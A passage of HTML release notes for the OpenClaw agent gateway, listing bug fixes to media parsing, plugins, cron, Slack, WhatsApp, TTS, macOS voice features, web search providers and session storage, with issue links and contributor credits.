<li>Media: trim serialized JSON suffixes after local <code>MEDIA:</code> directive file extensions, so generated-image metadata cannot pollute the parsed media path and cause false <code>ENOENT</code> delivery failures. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4360047482" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75182" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75182/hovercard" href="https://github.com/openclaw/openclaw/issues/75182">#75182</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/TnzGit/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/TnzGit">@TnzGit</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/hclsys/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/hclsys">@hclsys</a>.</li>
<li>Plugins/runtime: hot-reload Gateway plugin runtime surfaces after plugin enable/disable changes while keeping source-changing plugin install, update, and uninstall operations restart-backed so loaded module code is not reused. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4330564867" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72097" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/72097/hovercard" href="https://github.com/openclaw/openclaw/issues/72097">#72097</a>.</li>
<li>Cron: make scheduler reload schedule comparison tolerate malformed persisted jobs, so one bad cron entry no longer aborts the whole tick. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4367497925" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75886" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75886/hovercard" href="https://github.com/openclaw/openclaw/issues/75886">#75886</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/samfox-ai/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/samfox-ai">@samfox-ai</a>.</li>
<li>Doctor/channels: warn after migrations when default Telegram or Discord accounts have no configured token and their env fallback (<code>TELEGRAM_BOT_TOKEN</code> or <code>DISCORD_BOT_TOKEN</code>) is unavailable, with secret-safe migration docs for checking state-dir <code>.env</code>. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4350080379" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74298" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74298/hovercard" href="https://github.com/openclaw/openclaw/issues/74298">#74298</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/lolaopenclaw/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/lolaopenclaw">@lolaopenclaw</a>.</li>
<li>Gateway/diagnostics: keep idle liveness samples in telemetry instead of visible warning logs unless diagnostic work is active, waiting, or queued. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Channels/cron: reject provider-prefixed targets for the wrong channel and let prefixed announce targets such as <code>telegram:123</code> select their channel when delivery falls back to <code>last</code>, so Telegram IDs cannot be coerced into WhatsApp phone numbers. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4162988650" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/56839" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/56839/hovercard" href="https://github.com/openclaw/openclaw/issues/56839">#56839</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/bencoremans/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/bencoremans">@bencoremans</a>.</li>
<li>Control UI/chat: keep live replies visible when a raw session alias such as <code>main</code> sends the chat turn but Gateway emits events under the canonical session key for the same run. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4345216396" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73716" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73716/hovercard" href="https://github.com/openclaw/openclaw/issues/73716">#73716</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/teebes/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/teebes">@teebes</a>.</li>
<li>CLI/models: reject <code>--agent</code> on <code>openclaw models set</code> and <code>set-image</code> instead of silently writing agent-scoped requests to global model defaults. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4286636018" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/68391" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/68391/hovercard" href="https://github.com/openclaw/openclaw/issues/68391">#68391</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/derrickabellard/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/derrickabellard">@derrickabellard</a>.</li>
<li>CLI: stop treating the legacy singular <code>openclaw tool ...</code> token as a plugin id under restrictive <code>plugins.allow</code>, so it falls through as a normal unknown/reserved command instead of suggesting a stale allowlist entry. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4243981916" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/64732" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/64732/hovercard" href="https://github.com/openclaw/openclaw/issues/64732">#64732</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/efe-arv/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/efe-arv">@efe-arv</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/SweetSophia/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/SweetSophia">@SweetSophia</a>, and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/hashtag1974/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/hashtag1974">@hashtag1974</a>.</li>
<li>Media: write inbound media buffers through same-directory temp files before rename, so failed disk writes do not leave zero-byte artifacts for later voice transcription. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4154946745" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/55966" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/55966/hovercard" href="https://github.com/openclaw/openclaw/issues/55966">#55966</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/OpenCodeEngineer/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/OpenCodeEngineer">@OpenCodeEngineer</a>.</li>
<li>TTS/Telegram: keep trusted local audio generated by the TTS tool queued for voice-note delivery even when the run-level built-in tool list omits the raw <code>tts</code> name. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4354905008" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74752" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74752/hovercard" href="https://github.com/openclaw/openclaw/issues/74752">#74752</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Loveworld3033/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Loveworld3033">@Loveworld3033</a> and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/andyliu/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/andyliu">@andyliu</a>.</li>
<li>TTS: require explicit user or config audio intent for the agent speech tool so dashboard chats stay text unless audio is requested. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4303803702" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/69777" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/69777/hovercard" href="https://github.com/openclaw/openclaw/issues/69777">#69777</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/alexandre-leng/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/alexandre-leng">@alexandre-leng</a>.</li>
<li>Plugins/config: keep bundled source-checkout plugins from being runtime-gated by install-only <code>minHostVersion</code> metadata, accept prerelease host floors, trim plugin-service startup failures to one log line, and avoid broad channel-runtime loading during base config parsing. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Heartbeat: strip legacy <code>[TOOL_CALL]...[/TOOL_CALL]</code> and <code>[TOOL_RESULT]...[/TOOL_RESULT]</code> pseudo-call blocks from heartbeat replies before channel delivery. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4131762668" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/54138" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/54138/hovercard" href="https://github.com/openclaw/openclaw/issues/54138">#54138</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Deniable9570/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Deniable9570">@Deniable9570</a>.</li>
<li>macOS/Voice Wake: send wake-word and Push-to-Talk transcripts through the selected macOS session target instead of always falling back to main WebChat. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4107671050" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/51040" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/51040/hovercard" href="https://github.com/openclaw/openclaw/issues/51040">#51040</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/carl-jeffrolc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/carl-jeffrolc">@carl-jeffrolc</a>.</li>
<li>Providers/xAI: give Grok <code>web_search</code> a 60s default timeout, harden malformed xAI Responses parsing, and return structured timeout errors instead of aborting the tool call. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4175237199" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/58063" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/58063/hovercard" href="https://github.com/openclaw/openclaw/issues/58063">#58063</a> and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4183930735" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/58733" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/58733/hovercard" href="https://github.com/openclaw/openclaw/issues/58733">#58733</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/dnishimura/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/dnishimura">@dnishimura</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/marvcasasola-svg/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/marvcasasola-svg">@marvcasasola-svg</a>, and <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Nanako0129/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Nanako0129">@Nanako0129</a>.</li>
<li>Providers/configure: preserve the existing default model when adding or reauthing a provider whose plugin returns a default-model config patch. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4099627324" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/50268" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/50268/hovercard" href="https://github.com/openclaw/openclaw/issues/50268">#50268</a>. Thanks @rixcorp-oc.</li>
<li>Slack/DMs/routing: honor <code>dmHistoryLimit</code> for fresh 1:1 DMs, keep top-level DMs on stable DM sessions even when <code>replyToMode</code> targets thread replies, send text/block-only proactive DMs directly with <code>chat.postMessage(channel=&lt;user id&gt;)</code>, match Slack target route syntax such as <code>channel:C...</code>, <code>user:U...</code>, or <code>&lt;@U...&gt;</code>, and match public-channel allowlists against bare runtime channel IDs. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4240708914" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/64427" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/64427/hovercard" href="https://github.com/openclaw/openclaw/issues/64427">#64427</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4184870759" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/58832" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/58832/hovercard" href="https://github.com/openclaw/openclaw/issues/58832">#58832</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4213098355" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/62042" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/62042/hovercard" href="https://github.com/openclaw/openclaw/issues/62042">#62042</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4048907648" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/41608" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/41608/hovercard" href="https://github.com/openclaw/openclaw/issues/41608">#41608</a>, and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4046643845" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/41264" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/41264/hovercard" href="https://github.com/openclaw/openclaw/issues/41264">#41264</a>; supersedes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4160915756" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/56530" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/56530/hovercard" href="https://github.com/openclaw/openclaw/pull/56530">#56530</a>. Thanks @brantley-creator, @daye-jjeong, @MarkMolina, @Winnsolutionsadmin, @babutree, and @Realworld404.</li>
<li>Slack/delivery/capabilities: preserve missing-scope details in outbound errors, read granted scopes from <code>auth.test</code> metadata before legacy APIs, retry Slack writes only for wrapped DNS request failures such as <code>EAI_AGAIN</code>, and prefer the account bound to the outbound target peer in multi-workspace sends. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4216375787" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/62391" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/62391/hovercard" href="https://github.com/openclaw/openclaw/issues/62391">#62391</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4068646797" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/44625" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/44625/hovercard" href="https://github.com/openclaw/openclaw/issues/44625">#44625</a>, and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4289779783" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/68789" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/68789/hovercard" href="https://github.com/openclaw/openclaw/issues/68789">#68789</a>; supersedes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4264751663" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/66807" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/66807/hovercard" href="https://github.com/openclaw/openclaw/pull/66807">#66807</a>. Thanks @alexey-pelykh, @Qquanwei, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/martingarramon/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/martingarramon">@martingarramon</a>, @sonnyb9, and @rijhsinghani.</li>
<li>Slack/message actions/tools: send media before follow-up Block Kit messages for file sends, forward agent-scoped media roots through the bundled upload-file path, resolve <code>&lt;!subteam^...&gt;</code> user-group mentions before waking mention-gated channels, and let <code>read</code> fetch an exact Slack message timestamp or thread reply. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4111591995" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/51458" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/51458/hovercard" href="https://github.com/openclaw/openclaw/issues/51458">#51458</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4242973170" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/64625" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/64625/hovercard" href="https://github.com/openclaw/openclaw/issues/64625">#64625</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4346503795" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/73827" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/73827/hovercard" href="https://github.com/openclaw/openclaw/issues/73827">#73827</a>, and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4130437054" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/53943" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/53943/hovercard" href="https://github.com/openclaw/openclaw/issues/53943">#53943</a>. Thanks @HirokiKobayashi-R, @benpchandler, @CG-Intelligence-Agent-Jack, and @zomars.</li>
<li>PDF/Gemini: send native PDF analysis API keys in the <code>x-goog-api-key</code> header instead of the request URL, keeping secrets out of proxy and access logs. Supersedes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4202693803" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/60600" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/60600/hovercard" href="https://github.com/openclaw/openclaw/pull/60600">#60600</a>. Thanks @garagon.</li>
<li>Web search/Gemini/DuckDuckGo/Brave/fetch: route abort signals into Gemini provider fetches, late-bind managed agent <code>web_search</code> calls to the current runtime config snapshot, reuse Google provider API key/base URL as lower-priority Gemini search fallbacks, pass Gemini freshness/date filters through grounding, include DuckDuckGo in setup, honor Gemini/Grok/x_search <code>baseUrl</code> overrides, point Brave metadata at canonical docs, support Brave LLM Context freshness/date ranges, resolve external <code>webFetchProviders</code> for non-sandboxed fetches, and point missing-key errors to <code>web_fetch</code> or browser where appropriate. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4338236726" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/72995" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/72995/hovercard" href="https://github.com/openclaw/openclaw/issues/72995">#72995</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4362762607" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75420" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75420/hovercard" href="https://github.com/openclaw/openclaw/issues/75420">#75420</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4261488656" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/66498" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/66498/hovercard" href="https://github.com/openclaw/openclaw/issues/66498">#66498</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4253504720" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/65862" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/65862/hovercard" href="https://github.com/openclaw/openclaw/issues/65862">#65862</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4253527816" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/65870" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/65870/hovercard" href="https://github.com/openclaw/openclaw/issues/65870">#65870</a>, and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4355873723" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/74915" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/74915/hovercard" href="https://github.com/openclaw/openclaw/issues/74915">#74915</a>; supersedes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4167524438" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/57496" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/57496/hovercard" href="https://github.com/openclaw/openclaw/pull/57496">#57496</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4254540581" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/65940" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/65940/hovercard" href="https://github.com/openclaw/openclaw/pull/65940">#65940</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4212565688" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/61972" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/61972/hovercard" href="https://github.com/openclaw/openclaw/pull/61972">#61972</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4253794124" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/65892" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/65892/hovercard" href="https://github.com/openclaw/openclaw/pull/65892">#65892</a>, and <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4107380876" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/51005" data-hovercard-type="pull_request" data-hovercard-url="/openclaw/openclaw/pull/51005/hovercard" href="https://github.com/openclaw/openclaw/pull/51005">#51005</a>. Thanks @RoseKongPS, @richardmqq, @Aoiujz, @ismael-81, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Jah-yee/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Jah-yee">@Jah-yee</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Lanfei/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Lanfei">@Lanfei</a>, @Magicray1217, @remusao, @ultrahighsuper, @mingmingtsao, and @zhaoyang97.</li>
<li>Slack/directory: make <code>openclaw directory peers/groups list --channel slack</code> prefer token-backed live readers and return the connected Slack account from <code>directory self</code>, so valid Slack tokens no longer produce empty directory CLI results. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4105363396" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/50776" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/50776/hovercard" href="https://github.com/openclaw/openclaw/issues/50776">#50776</a>. Thanks @pjaillon.</li>
<li>Slack: keep assistant typing status, temporary typing reactions, and status reactions active for group/channel turns that use message-tool-only visible replies, while still suppressing automatic source replies. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4367334076" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75877" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75877/hovercard" href="https://github.com/openclaw/openclaw/issues/75877">#75877</a>. Thanks @teosborne.</li>
<li>Slack: recover full inbound DM text from top-level rich-text blocks when Slack sends a shortened message preview, so long direct messages still reach the agent intact. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4147105482" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/55358" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/55358/hovercard" href="https://github.com/openclaw/openclaw/issues/55358">#55358</a>. Thanks @tonyjwinter.</li>
<li>Replies: strip legacy <code>[TOOL_CALL]{tool =&gt; ..., args =&gt; ...}[/TOOL_CALL]</code> pseudo-call text from user-facing replies and flag it in tool-call diagnostics instead of showing raw tool syntax in channels. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4230337239" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/63610" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/63610/hovercard" href="https://github.com/openclaw/openclaw/issues/63610">#63610</a>. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/canh0chua/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/canh0chua">@canh0chua</a>.</li>
<li>WhatsApp: close long-lived web sockets through Baileys <code>end(error)</code> before falling back to raw websocket close, so listener teardown runs Baileys cleanup instead of leaving zombie sockets. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4116852446" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/52442" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/52442/hovercard" href="https://github.com/openclaw/openclaw/issues/52442">#52442</a>. Thanks @essendigitalgroup-cyber.</li>
<li>Twitch/plugins: emit a flat JSON Schema for Twitch channel config so single-account and multi-account configs validate before runtime load, and add source-checkout diagnostics for missing pnpm workspace dependencies. Thanks <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/vincentkoc/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/vincentkoc">@vincentkoc</a>.</li>
<li>Gateway/sessions: move hot transcript reads and mirror appends onto async bounded IO with serialized parent-linked writes, keeping large session histories from stalling Gateway requests and channel replies. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4364571913" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75656" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75656/hovercard" href="https://github.com/openclaw/openclaw/issues/75656">#75656</a>. Thanks @DerFlash.</li>
<li>macOS/Talk Mode: downmix multi-channel microphone buffers before handing them to Apple Speech across Push-to-Talk, Talk Mode, Voice Wake, and the wake-word tester, so pro audio interfaces no longer produce empty transcripts. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4054504623" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/42533" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/42533/hovercard" href="https://github.com/openclaw/openclaw/issues/42533">#42533</a>. Thanks @jbuecker.</li>
<li>macOS/Talk Mode: subscribe native WebChat to active-session transcript updates and render external spoken user turns in the chat thread instead of only showing assistant replies. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4359538657" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/75155" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/75155/hovercard" href="https://github.com/openclaw/openclaw/issues/75155">#75155</a>. Thanks @SledderBling.</li>
<li>macOS/Voice Wake: accept trigger-only phrases in the built-in Voice Wake test, matching the settings UI and runtime trigger-only path instead of requiring extra command text after the wake word. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4245638367" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/64986" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/64986/hovercard" href="https://github.com/openclaw/openclaw/issues/64986">#64986</a>. Thanks @zoiks65.</li>
<li>Cron/TTS: run cron announce payloads through the normal TTS directive transform before outbound delivery, so scheduled <code>[[tts]]</code> replies generate voice payloads instead of leaking raw tags. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4115170457" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/52125" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/52125/hovercard" href="https://github.com/openclaw/openclaw/issues/52125">#52125</a>. Thanks @kenchen3000.</li>
<li>WhatsApp: save downloadable quoted image media from reply context as inbound media, so agents can inspect an image that a user replied to instead of only seeing <code>&lt;media:image&gt;</code>. Fixes <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="4188698212" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/59174" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/59174/hovercard" href="https://github.com/openclaw/openclaw/issues/59174">#59174</a>. Thanks @gaffner.</li>
<li>Sessions/store: stop persisting the runtime-only <code>skillsSnapshot.resolvedSkills</code> array inside each session entry, so <code>sessions.json</code> no longer carries a copy of every parsed <code>SKILL.md</code> body for every active session; <code>ensureSkillSnapshot</code> rehydrates the array from disk on cold resume so the embedded runner, the Claude CLI skills plugin, and the Claude live-session fingerprint all see populated skills, and legacy stores self-heal on the next save. Refs <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3913009724" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/11950" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/11950/hovercard" href="https://github.com/openclaw/openclaw/issues/11950">#11950</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3883150285" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/6650" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/6650/hovercard" href="https://github.com/openclaw/openclaw/issues/6650">#6650</a>, <a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="3934112753" data-permission-text="Title is private" data-url="https://github.com/openclaw/openclaw/issues/15000" data-hovercard-type="issue" data-hovercard-url="/openclaw/openclaw/issues/15000/hovercard" href="https://github.com/openclaw/openclaw/issues/15000">#15000</a>. Thanks @amoghasgekar.</li>
